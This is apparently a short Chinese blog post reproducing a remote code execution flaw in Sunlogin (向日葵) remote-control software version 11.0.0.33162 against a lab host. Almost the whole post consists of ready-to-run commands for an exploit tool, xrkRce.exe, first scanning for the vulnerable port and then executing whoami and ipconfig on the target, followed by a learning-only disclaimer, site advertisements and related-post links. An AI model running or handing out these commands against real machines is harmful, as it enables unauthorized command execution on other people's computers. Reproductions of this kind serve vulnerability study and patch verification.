向日葵RCE复现
1、影响版本
11.0.0.33162
2、存在漏洞主机:192.168.1.9
3、扫描是否存在RCE漏洞
存在,端口是51258
.\xrkRce.exe -h 192.168.1.9 -t scan
4、RCE利用
成功执行whoami、ipconfig命令
.\xrkRce.exe -h 192.168.1.9 -t rce -p 51258 -c "whoami"
.\xrkRce.exe -h 192.168.1.9 -t rce -p 51258 -c "ipconfig"
声明:文章只用于学习交流,由于利用的信息而造成的任何或直接的此文传播后果,作者不承担任何直接责任,一切法律后果均由攻击者承担!
【推荐】国内首个AI IDE,深度理解中文开发场景,立即下载体验Trae
【推荐】编程新体验,更懂你的AI,立即体验豆包MarsCode编程助手
【推荐】抖音旗下AI助手豆包,你的智能百科全书,全免费不限次数
【推荐】轻量又高性能的 SSH 工具 IShell:AI 加持,快人一步
· 25岁的心里话
· 闲置电脑爆改个人服务器(超详细) #公网映射 #Vmware虚拟网络编辑器
· 零经验选手,Compose 一天开发一款小游戏!
· 因为Apifox不支持离线,我果断选择了Apipost!
· 通过 API 将Deepseek响应流式内容输出到前端
2020-02-20 SSRF原理和实验
2020-02-20 xss和CSRF的概念和区别
2020-02-20 shell命令运行符号&、;、&&区别